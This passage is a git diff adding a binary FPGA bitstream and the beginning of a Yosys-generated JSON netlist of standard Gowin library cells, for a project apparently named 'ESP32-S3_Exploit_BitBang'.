+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101001011101001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011110000110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110011010001110011 +0000101000000000000000000000000000000000000000000100100111011011 +1111111111111111111111111111111111111111111111111111111111111111 +00001000000000000000000000000000 +1111111111111111111111111111111111111111111111111111111111111111 +1111111111111111 diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.json b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.json new file mode 100644 index 0000000..d9a613f --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.json @@ -0,0 +1,30720 @@ +{ + "creator": "Yosys 0.44+60 (git sha1 72f77dd97, x86_64-w64-mingw32-g++ 13.2.1 -O3)", + "modules": { + "$__ABC9_DELAY": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.1-7.10" + }, + "parameter_default_values": { + "DELAY": "00000000000000000000000000000000" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$2232": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000000000000", + "T_FALL_MIN": "00000000000000000000000000000000", + "T_FALL_TYP": "00000000000000000000000000000000", + "T_RISE_MAX": "00000000000000000000000000000000", + "T_RISE_MIN": "00000000000000000000000000000000", + "T_RISE_TYP": "00000000000000000000000000000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:5.5-5.22" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 3 ], + "EN": [ "1" ], + "SRC": [ 2 ] + } + } + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.29-2.30" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.39-2.40" + } + } + } + }, + "$__ABC9_SCC_BREAKER": { + "attributes": { + "dynports": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:9.1-11.10" + }, + "parameter_default_values": { + "WIDTH": "00000000000000000000000000000000" + }, + "ports": { + "I": { + "direction": "input", + "offset": -1, + "upto": 1, + "bits": [ 2, 3 ] + }, + "O": { + "direction": "output", + "offset": -1, + "upto": 1, + "bits": [ 4, 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2, 3 ], + "offset": -1, + "upto": 1, + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:9.47-9.48" + } + }, + "O": { + "hide_name": 0, + "bits": [ 4, 5 ], + "offset": -1, + "upto": 1, + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:9.69-9.70" + } + } + } + }, + "$__DFF_N__$abc9_flop": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:14.1-20.10" + }, + "ports": { + "C": { + "direction": "input", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "Q": { + "direction": "input", + "bits": [ 4 ] + }, + "n1": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "C": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:14.36-14.37" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:14.39-14.40" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:14.42-14.43" + } + }, + "n1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:14.52-14.54" + } + } + } + }, + "$__DFF_P__$abc9_flop": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:23.1-29.10" + }, + "ports": { + "C": { + "direction": "input", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "Q": { + "direction": "input", + "bits": [ 4 ] + }, + "n1": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "C": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:23.36-23.37" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:23.39-23.40" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:23.42-23.43" + } + }, + "n1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:23.52-23.54" + } + } + } + }, + "$paramod$__ABC9_DELAY\\DELAY=32'00000000000000000000000000111111": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "hdlname": "__ABC9_DELAY", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.1-7.10" + }, + "parameter_default_values": { + "DELAY": "00000000000000000000000000111111" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$2232": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000000000111111", + "T_FALL_MIN": "00000000000000000000000000111111", + "T_FALL_TYP": "00000000000000000000000000111111", + "T_RISE_MAX": "00000000000000000000000000111111", + "T_RISE_MIN": "00000000000000000000000000111111", + "T_RISE_TYP": "00000000000000000000000000111111" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:5.5-5.22" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 3 ], + "EN": [ "1" ], + "SRC": [ 2 ] + } + } + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.29-2.30" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.39-2.40" + } + } + } + }, + "$paramod$__ABC9_DELAY\\DELAY=32'00000000000000000000001001000000": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "hdlname": "__ABC9_DELAY", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.1-7.10" + }, + "parameter_default_values": { + "DELAY": "00000000000000000000001001000000" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$2232": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001001000000", + "T_FALL_MIN": "00000000000000000000001001000000", + "T_FALL_TYP": "00000000000000000000001001000000", + "T_RISE_MAX": "00000000000000000000001001000000", + "T_RISE_MIN": "00000000000000000000001001000000", + "T_RISE_TYP": "00000000000000000000001001000000" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:5.5-5.22" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 3 ], + "EN": [ "1" ], + "SRC": [ 2 ] + } + } + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.29-2.30" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/abc9_model.v:2.39-2.40" + } + } + } + }, + "$paramod\\ALU\\ALU_MODE=s32'00000000000000000000000000000010": { + "attributes": { + "hdlname": "ALU", + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:931.1-1014.10" + }, + "parameter_default_values": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "ports": { + "SUM": { + "direction": "output", + "bits": [ 2 ] + }, + "COUT": { + "direction": "output", + "bits": [ 3 ] + }, + "I0": { + "direction": "input", + "bits": [ 4 ] + }, + "I1": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "CIN": { + "direction": "input", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "CIN": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:936.24-936.27" + } + }, + "COUT": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:933.7-933.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:934.7-934.9" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:935.7-935.9" + } + }, + "SUM": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:937.8-937.11" + } + } + } + }, + "ADC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1681.1-1682.10" + }, + "ports": { + }, + "cells": { + }, + "netnames": { + } + }, + "ALU": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:931.1-1014.10" + }, + "parameter_default_values": { + "ALU_MODE": "00000000000000000000000000000000" + }, + "ports": { + "SUM": { + "direction": "output", + "bits": [ 2 ] + }, + "COUT": { + "direction": "output", + "bits": [ 3 ] + }, + "I0": { + "direction": "input", + "bits": [ 4 ] + }, + "I1": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + }, + "CIN": { + "direction": "input", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "CIN": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:936.24-936.27" + } + }, + "COUT": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:933.7-933.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:934.7-934.9" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:935.7-935.9" + } + }, + "SUM": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:937.8-937.11" + } + } + } + }, + "ALU54D": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1333.1-1351.10" + }, + "parameter_default_values": { + "ACCLOAD_REG": "0", + "ALUD_MODE": "00000000000000000000000000000000", + "ALU_RESET_MODE": "SYNC", + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "B_ADD_SUB": "0", + "C_ADD_SUB": "0", + "OUT_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 